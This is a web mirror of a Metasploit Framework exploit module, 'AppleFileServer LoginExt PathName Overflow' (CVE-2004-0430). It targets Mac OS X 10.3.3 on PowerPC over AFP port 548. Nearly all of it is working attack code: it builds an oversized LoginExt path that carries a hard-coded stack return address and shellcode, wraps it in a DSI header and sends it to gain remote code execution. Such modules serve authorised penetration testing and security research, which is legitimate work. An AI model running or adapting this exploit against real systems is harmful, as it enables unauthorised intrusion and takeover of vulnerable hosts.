Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/afp/loginext.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'AppleFileServer LoginExt PathName Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in the AppleFileServer service

18
          on MacOS X. This vulnerability was originally reported by Atstake and

19
          was actually one of the few useful advisories ever published by that

20
          company. You only have one chance to exploit this bug.

21
          This particular exploit uses a stack-based return address that will

22
          only work under optimal conditions.

23
        },

24
        'Author' => 'hdm',

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2004-0430'],

28
          [ 'OSVDB', '5762'],

29
          [ 'BID', '10271'],

30
        ],

31
        'Payload' => {

32
          'Space' => 512,

33
          'BadChars' => "\x00\x20",

34
          'MinNops' => 128,

35
          'Compat' =>

36
                        {

37
                          'ConnectionType' => "+find"

38
                        }

39
        },

40
        'Platform' => %w{osx},

41
        'Targets' => [

42
          # Target 0

43
          [

44
            'Mac OS X 10.3.3',

45
            {

46
              'Platform' => 'osx',

47
              'Arch' => ARCH_PPC,

48
              'Ret' => 0xf0101c0c # stack address :<

49
            },

50
          ],

51
        ],

52
        'DisclosureDate' => '2004-05-03',

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    # Configure the default port to be AFP

62
    register_options(

63
      [

64
        Opt::RPORT(548),

65
      ]

66
    )

67
  end

68


69
  def exploit

70
    connect

71


72
    print_status("Trying target #{target.name}...")

73


74
    path = "\xff" * 1024

75
    path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)

76
    path[172, payload.encoded.length] = payload.encoded

77


78
    # The AFP header

79
    afp = "\x3f\x00\x00\x00"

80


81
    # Add the authentication methods

82
    ["AFP3.1", "Cleartxt Passwrd"].each { |m|

83
      afp << [m.length].pack('C') + m

84
    }

85


86
    # Add the user type and afp path

87
    afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)

88
    afp << "\x03" + [path.length].pack('n') + path

89


90
    # Add the data stream interface header

91
    dsi =

92
      [

93
        0,           # Flags

94
        2,           # Command

95
        rand(65536), # XID

96
        0,           # Data Offset

97
        afp.length,  # Data Length

98
        0            # Reserved

99
      ].pack("CCnNNN") + afp

100


101
    sock.put(dsi)

102


103
    handler

104


105
    disconnect

106
  end

107
end

108


109